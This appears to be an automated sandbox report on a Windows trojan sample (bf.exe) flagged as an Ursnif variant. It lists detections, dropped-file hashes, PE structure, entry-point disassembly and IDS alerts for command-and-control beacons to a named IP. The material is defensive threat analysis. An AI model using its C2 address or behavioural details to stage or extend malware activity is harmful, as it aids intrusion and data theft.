Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 13 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
76% | Virustotal | Browse | ||
30% | Metadefender | Browse | ||
100% | Avira | TR/Crypt.XPACK.Gen7 | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen7 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
trackingg-protectioon.cdn1.mozilla.net | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.8.158.104 | unknown | Russian Federation | 49392 | ASBAXETNRU | true |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 722154 |
Start date and time: | 2022-10-13 09:27:32 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | bf.exe |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winEXE@15/16@2/1 |
EGA Information: |
|
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): WMIADAP.exe, WmiPrvSE.exe
- Execution Graph export aborted for target mshta.exe, PID 5064 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
09:31:04 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.8.158.104 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ASBAXETNRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr |
MD5: | 1F1446CE05A385817C3EF20CBD8B6E6A |
SHA1: | 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D |
SHA-256: | 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE |
SHA-512: | 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1196 |
Entropy (8bit): | 5.333915035046385 |
Encrypted: | false |
SSDEEP: | 24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG |
MD5: | B15D7C50C640BEF4A1E823CE568A5E5E |
SHA1: | E456E2EE754F8FBA38F8F75858491258896C9E41 |
SHA-256: | A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0 |
SHA-512: | B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 418 |
Entropy (8bit): | 5.060887643546001 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuYl85FNVMRSR7a1X+o6RwuSRa+rVSSRnA/fMMLjUgL/Qy:V/DTLDfufVM62l9rV5nA/kePIy |
MD5: | 19FD6F555AD7C58D574C00F46F087B02 |
SHA1: | 025EC4778721F20FDBFF775EDD2351BAEA93846C |
SHA-256: | 9D08DF39AD05BD4A53F416AB8EF6A2FCA313EB9A1498E451284B445BB1830DAC |
SHA-512: | 188488549588E593523DDAB3A8372D47E016841C3CE1594A456C0AC7C73763A3AE1E8A5FFFDC7B6455BD869D0F6BDEBD6B6BCB2AA6A6B4CF658231CE72DC40B9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 353 |
Entropy (8bit): | 5.245731191650942 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fFJ0zxs7+AEszI923fHyWHn:p37Lvkmb6KztJ0WZE2qAn |
MD5: | 4B8045D39F538756B8B62138A26F11E9 |
SHA1: | 95874A0DCB5655188CFD8602A1A4DCD01B521B96 |
SHA-256: | B3C78ADC05D493C0E52386D05C77480C94B732423C3B7349DF6DA13F9C5E2F41 |
SHA-512: | 8C66F125151F75F4DDC2FB9062D001DCC25942DE34AB42C389D0D17E36AE2C3AABB6C5FDA9157D9BC966691A5A868B9387FA2F998EA301303B87C55EDF1B7C32 |
Malicious: | true |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6453992775319892 |
Encrypted: | false |
SSDEEP: | 24:etGSG8mmUgtJ85HIf/EEOnV4qmShytkZf4FexdVWpEWI+ycuZhN0xmGakSfxmXPE:6wXgt65oinB1J4FcdVyn1ulWa3iq |
MD5: | 5C4B891208032DBA1A02263355E4E9DE |
SHA1: | 1BD3E625D095A101173CAF1D794FE92AD02D0C4E |
SHA-256: | 004F167A5796CA987BCC5D4FAC040D72A10D39450F74A13147E72C0DCEC80AA4 |
SHA-512: | 224AEE577A4B6F6F804C82B26512FC201C78D213EAB1F983306F12AD456B57C77849E5D91DC22B54820B080220EA2A64753896960B98C349DBBA59AF6942E940 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 850 |
Entropy (8bit): | 5.317499521256793 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KztJVE21uKaM5DqBVKVrdFAMBJTH:Akka6aDVE2QKxDcVKdBJj |
MD5: | 967799D658DF042EC73377D634879017 |
SHA1: | 65B430F7577DF05F38080FFC1165C97BD6EDC1F2 |
SHA-256: | 26533FAEFCD5B67D4B81CC17D362A2A238120A044B92C4CB55E662CFE4C2C085 |
SHA-512: | B4A0A2B0D8DC98F78E68476EC113B1872A2F51C9D4AC9A3AD84DA2697501C3CC2349B1772B4DCD650E91CE9F76A46B0678603A204ABBB2DF2F21E7960FEBD16A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.071104180333077 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqKPN5Dlq5J:+RI+ycuZhNiakSKPNnqX |
MD5: | 77F267516B1EB24FF441C7AEFFE7CEEA |
SHA1: | 919FD845A3D90A83436CD074A4859048C5B8B64F |
SHA-256: | 054F1B995460C13C56857907432CB6A8F7C02F68BF403D75DF681011D52B8640 |
SHA-512: | 4B787F2F398D6E56E820D37D83E4586E9D927A4C8B2EAD2C91BF9057D392CFDFFCAAA79E5B663DE4DD7DF8366D95766A9A956E18B479DE10241A80986E92119F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0985185644301043 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2lxmGak7YnqqFlxmXPN5Dlq5J:+RI+ycuZhN0xmGakSfxmXPNnqX |
MD5: | E73626B90519176EF74EEFA1FBBF8359 |
SHA1: | B83852A543258A18918D5FCAC5B70AB5BA0D2B93 |
SHA-256: | 3CBC786D97DE3D7A7F7F9E537EB4143D0085294DF5A1A5F80059D4644397BC45 |
SHA-512: | 02D0C8C4FF7ABE946BA74DA1C0FF87063DC27EB25F062D8E59A9AF5CD7CE6FA98C5936DBA4EE1888702A70287D94B95F8BE624852F331455E8920819F61D0E00 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9871089313851615 |
Encrypted: | false |
SSDEEP: | 24:HMnW9BiyQr68uHghKdNII+ycuZhN0xmGakSfxmXPNnq9hgd:KsiXuiKdu1ulWa3iq9y |
MD5: | 34E8D570049C9D06F2FF7C67BB1CE119 |
SHA1: | CFC0D654192DD0A7F2B6791AD807B30040F62283 |
SHA-256: | 1F149258DAFCB5E28457E7290144535E4A82EE26B50707128325DB8ABEDEC660 |
SHA-512: | FDE97C0EB9559A196EF12B4C91CA2C0981A9F75991430C6759E24BBD03709A806D270BE6458B6A13CAA04D674FC23D93F3CE34E0185243CDCA58F158CD1ABB0B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9582729102086303 |
Encrypted: | false |
SSDEEP: | 24:HynW9Bit0iuuH5hKdNII+ycuZhNiakSKPNnq9hgd:UsitwunKdu1ulia3mq9y |
MD5: | 8C3DC050387A0493058D36D4B6CF27B1 |
SHA1: | C88C189BBA9142F115A3A17D15A9B422B56D37D3 |
SHA-256: | CB62F45C1C604DFB9C20DF39F2071D92D6C48BF98D668D356D3E0CF764434AC8 |
SHA-512: | 29DCB6B3FA9333F4DB07DF839AF10638859AD132690E9476B532DA7BF35FA51E5C723D05807073620B66F29AA42C33DD38498D89EA43E12FD24B68828E1BFEFC |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 400 |
Entropy (8bit): | 4.978058994390849 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuYl8HPMRSRa+eNMjSSRru+LjGVZfmaSRNEolEimZlRBPFQy:V/DTLDfuJ9eg5ru+Ly8yWEPlRBiy |
MD5: | F31A91CB873D422F30E84BFC6F0E4919 |
SHA1: | 87946E5B050BC8C66C9F04EBB9F82E210522D8EE |
SHA-256: | 91AF8FC99B650C87F7C49FAA1E0499F673E034ED712EB62782CFACBDF8329F84 |
SHA-512: | 242E12D8C01EF5BF6866FC09BD8A4AB9FB6C7EA1AC4BEAD56610DB30F15F0C7B38D7DA8706AB4BB8AD5647D5B2CCFB9717B85324CA0099C6DCDD7FDE13E5906B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 353 |
Entropy (8bit): | 5.190119417850032 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGFzxs7+AEszI923fGA:p37Lvkmb6KzuWZE2j |
MD5: | 6F676A14F55792FCAF9AB8D3BC3930D3 |
SHA1: | C2FFBC5923D1AE477656A42CF3E983524AFD5687 |
SHA-256: | FBA75ABB7F20F45450B907669B0A0D01A02D060A647A1E14425338A3CB32A807 |
SHA-512: | D76EB02D9B0A4551FCC56485E85FA8992A8920D2361CBB4D9D721F2804BEF087B9BB603CA32EE8CB5EAE591F12C14D8D7578BB476C2D5FC385867D3D4148C60F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.604625908121872 |
Encrypted: | false |
SSDEEP: | 48:6CXQ3r5BAbBicLCL1Wh4JeL31ulia3mq:8b5BiLVuEK |
MD5: | D6661E74516E95B8506921C266FCC378 |
SHA1: | D4A317550C91B8D1BAC27056A2D176D2A46195E7 |
SHA-256: | B86245487032D5B0AB8C861DC33CF96333D046394F3A4CB83E586B92504BF63C |
SHA-512: | 6BB01F1FCD2617BF8BFEB7757278ECD3A5F2A2FC46D72661E148E485BFB511B8E6C483794D444C98573BFB655FC12389331DDD89E268D64BBAF8361A3F957215 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 850 |
Entropy (8bit): | 5.294801983238796 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KzuWZE2CKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzvE2CKaM5DqBVKVrdFAMBJTH |
MD5: | E21C14E505268332566B043E3A794256 |
SHA1: | F402FC38AAD9C5B16B90C809E71CE61FBD5B6E53 |
SHA-256: | 568B3CC6ED8389B85718933FE231DB4152F86EC9865A81C6E2284D3DB23E1710 |
SHA-512: | D50F72A3E315A1C8FED7B20B35106AC4AB5FC012C3B0AB6F1B5A2EF30D08518DAA93D14559D39B2A785B9E9180F072A4072E69670DA49D4BCC6889BF245EB11F |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.519660398973527 |
TrID: |
|
File name: | bf.exe |
File size: | 37888 |
MD5: | b7ce4f9f6ecd85bb5edbb6964226fdb6 |
SHA1: | 12b28a42e960dfc522348eba37b00ea74a0df527 |
SHA256: | bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb |
SHA512: | 1f5588d5b0816bbfc51394f434a9a80a96c68b66ca86a6a3cd53d64bf6a63751902c5f782a15522749231022c2695c6df7fbc604ae1d242f21554269f6d31e86 |
SSDEEP: | 768:7QLm41fM01vAoyRdq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiuU:7L41fMSvVAdqlaPGhVMq2LpeReOb2Pmm |
TLSH: | FD03D1A76BA004BAC9D383353A396685DF441332423958E0E7BB4A398BD6C4FD56F713 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/...... |
Icon Hash: | 00828e8e8686b000 |
Entrypoint: | 0x40182f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x632596C9 [Sat Sep 17 09:43:37 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 1640d668d1471f340cbe565fe63522f6 |
Instruction |
---|
push esi |
xor esi, esi |
push esi |
push 00400000h |
push esi |
call dword ptr [0040203Ch] |
mov dword ptr [00403160h], eax |
cmp eax, esi |
je 00007F3B38DDEC97h |
push esi |
call dword ptr [00402008h] |
mov dword ptr [00403170h], eax |
call dword ptr [00402044h] |
call 00007F3B38DDE8A9h |
push dword ptr [00403160h] |
mov esi, eax |
call dword ptr [00402040h] |
push esi |
call dword ptr [00402048h] |
pop esi |
push ebp |
mov ebp, esp |
sub esp, 0Ch |
push ebx |
push esi |
mov esi, eax |
mov eax, dword ptr [00403180h] |
mov ecx, dword ptr [esi+3Ch] |
mov ecx, dword ptr [ecx+esi+50h] |
lea edx, dword ptr [eax-69B24F45h] |
not edx |
lea ecx, dword ptr [ecx+eax-69B24F45h] |
push edi |
and ecx, edx |
lea edx, dword ptr [ebp-08h] |
push edx |
lea edx, dword ptr [ebp-04h] |
push edx |
add eax, 964DA0FCh |
push eax |
push ecx |
call 00007F3B38DDEEFDh |
test eax, eax |
jne 00007F3B38DDECCCh |
mov edi, dword ptr [ebp-04h] |
push esi |
push edi |
call 00007F3B38DDEFD3h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDECA8h |
mov esi, dword ptr [edi+3Ch] |
add esi, edi |
push esi |
call 00007F3B38DDE6F4h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDEC97h |
push edi |
mov eax, esi |
call 00007F3B38DDF1D4h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDEC89h |
mov esi, dword ptr [esi+28h] |
push eax |
push 00000001h |
add esi, edi |
push edi |
call esi |
test eax, eax |
jne 00007F3B38DDEC7Ah |
call dword ptr [0000202Ch] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20e8 | 0x50 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5000 | 0x10 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xd8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0xa8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1000 | 0x1000 | False | 0.718017578125 | data | 6.515539058364033 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x2000 | 0x4c0 | 0x600 | False | 0.4635416666666667 | data | 4.488955985688776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x3000 | 0x194 | 0x200 | False | 0.056640625 | data | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.bss | 0x4000 | 0x2dc | 0x400 | False | 0.7607421875 | data | 6.3016514258390215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x5000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6000 | 0x8000 | 0x7200 | False | 0.9711143092105263 | data | 7.860073249744783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
DLL | Import |
---|---|
ntdll.dll | _snwprintf, memset, NtQuerySystemInformation, _aulldiv |
KERNEL32.dll | GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC |
ADVAPI32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorA |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
192.168.2.545.8.158.10449696802033204 10/13/22-09:30:54.079674 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
192.168.2.545.8.158.10449696802033203 10/13/22-09:30:55.414317 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 13, 2022 09:30:53.217489004 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.309739113 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.309973955 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.311197996 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.403239965 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.640887022 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.640933037 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.640959024 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.640983105 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641011000 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641037941 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641058922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641083956 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641103029 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.641108036 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641143084 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.641199112 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.641237974 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733346939 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733412027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733474016 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733517885 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733557940 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733597994 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733604908 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733638048 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733648062 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733660936 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733684063 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733716965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733726025 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733745098 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733767033 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733792067 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733808041 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733825922 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733850002 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733871937 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733890057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733901978 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733932018 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733948946 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.733972073 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.733993053 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
